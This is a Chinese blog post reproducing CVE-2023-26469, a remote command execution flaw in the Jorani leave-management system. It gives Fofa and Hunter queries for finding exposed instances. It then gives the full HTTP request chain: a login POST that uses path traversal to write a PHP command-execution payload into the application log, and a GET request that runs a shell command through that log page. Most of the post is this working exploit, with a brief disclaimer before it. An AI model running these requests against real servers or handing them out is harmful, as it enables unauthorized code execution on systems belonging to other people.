Jorani远程命令执行漏洞 CVE-2023-26469

已于 2023-11-02 17:48:56 修改
阅读量706 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全 安全 网络安全 php
于 2023-11-02 10:45:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/134170020
版权

Jorani远程命令执行漏洞 CVE-2023-26469

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。

漏洞影响

Jorani < 1.0.2

漏洞危害

攻击者可以利用路径遍历来访问文件并在服务器上执行代码。

网络测绘

Fofa: title=“Jorani”

在这里插入图片描述
在这里插入图片描述

Hunter: web.title=“Jorani”

漏洞复现

1. 获取cookie

在这里插入图片描述

GET /session/login HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

2. 构造poc

在这里插入图片描述

POST /session/login HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?
Cookie:  csrf_cookie_jorani=a3ab3adxxxxxxxxxx4606ecdd;jorani_session=smgd1ebvn2pxxxxxxxxxxxtbubagonjg
Content-Type: application/x-www-form-urlencoded
Content-Length: 160

csrf_test_jorani=a3ab3adxxxxxxxxxx4606ecdd&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<%3f%3d`$_GET[1]`%3f>&CipheredValue=test

3. 执行命令

在这里插入图片描述

GET /pages/view/log-2023-11-02?1=id HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?
X-REQUESTED-WITH: XMLHttpRequest
Cookie:  csrf_cookie_jorani=a3ab3ada05xxxxxxxxxxx4606ecdd;jorani_session=vtj9ig0s557xxxxxxxxxxskr16
小胡yhu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Roxy-Wi 远程命令执行漏洞 CVE-2022-31137
LiBai'S BLOG
10-12 3243
Roxy-WI是用于管理Haproxy、Nginx和Keepalived服务器的Web界面。Roxy-WI 5.2.2.0及更早版本存在命令注入漏洞。攻击者可通过options.py利用该漏洞进行命令注入攻击。
泛微 E-Office文件上传漏洞复现(CVE-2023-2523、CVE-2023-2648)
热门推荐
0xSec
05-23 1万+
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 9.5版本,源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。
春秋云镜 CVE-2023-26469
qq274575499的博客
03-29 1037
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 5728
网络安全-CVE - CIS 漏洞分析以及解决
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 ...
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
网络安全之密码学技术
缘友一世的博客
04-29 1230
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 1604
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
匠心精神与创新力量:构筑网络安全的新防线
最新发布
weixin_51347473的博客
04-30 437
在数字化时代,随着技术的飞速发展,网络安全问题日益凸显,成为全球关注的焦点。2024年哈经开区十大匠心提名之一的亿林网络李璐昆,正是在这样的背景下,以其匠心精神和创新实践,为网络安全领域贡献了重要力量。
网络安全实训Day16
Yisitelz的博客
04-26 1265
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
网络安全WebShell截获
为了生活,不得不努力奋斗!
04-24 696
【代码】网络安全WebShell截获。
如何避免被恶意攻击的IP地址
m0_73834612的博客
04-27 446
同时,通过建立白名单,只允许信任的IP地址进行访问,减少未经授权的访问和攻击行为。同时,监控和关注安全厂商的漏洞公告和警报,及时采取相应的防护措施,降低被攻击的风险。实施严格的访问控制策略是防止被恶意攻击的IP地址的重要手段之一。通过配置防火墙,限制不明来源的网络流量,并设置入侵检测系统,实时监控网络流量,发现并阻止恶意攻击行为,提高网络安全性。要避免被恶意攻击的IP地址,需要采取一系列综合的网络安全措施,包括定期更新安全补丁、配置防火墙和入侵检测系统、使用IP黑名单和白名单、实施访问控制策略、
网络安全(黑客)—2024自学
dexi113的博客
04-25 2101
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!
网络安全知识点
lv785的博客
04-26 1598
概念:IPSec 是“IP 安全”的缩写,是IETF在开发 IPv6时为保证IP数据报安全而设计的,是IPv6的一个组成 部分、是IPv4的可选项,其基本目的就是把安全机制引入 IP协议。欺骗:指利用主机之间的正常信任关系,通过修改IP数据包中的源地址,以绕开主机或网络访问控制、隐藏攻击来源的攻击技术。概念:入侵检测就是对入侵行为的 检测与发现,即在计算机网络系统中的若干关键点搜集信息,通过对所收集信息的分析发现网络系统中是否有违反安全策略的行为和遭到攻击的迹象。简要分析RSA算法的安全性得以保障的原因。
cve-2023-36844
01-26
CVE-2023-36844是一种安全漏洞,它影响某个特定的软件或系统。根据CVE命名规则,它是在2023年被发现和分配的漏洞编号。 关于CVE-2023-36844漏洞的具体详情,由于缺乏具体信息,我无法提供详细的漏洞描述。通常,CVE漏洞编号用于标识软件或系统中的安全问题,以便用户、开发人员和安全研究人员能够更好地了解漏洞的性质和潜在风险。 如果我要提供有关CVE-2023-36844的建议,我会强烈建议用户尽快更新相关软件或系统,以修复这个安全漏洞。此外,我还建议用户保持良好的网络安全实践,包括定期备份数据、注意不明来源的链接和附件、使用强密码以及确保及时应用软件更新和补丁程序。 最重要的是,对于任何潜在的安全漏洞,请保持关注并及时了解相关软件或系统厂商的安全更新和建议。与此同时,如果有任何疑问或需要进一步的帮助,建议寻求专业的安全机构或安全专家的意见。 总之,CVE-2023-36844是一个特定软件或系统的漏洞编号,我建议用户关注更新以及采取必要的网络安全措施以保护个人和组织的信息安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值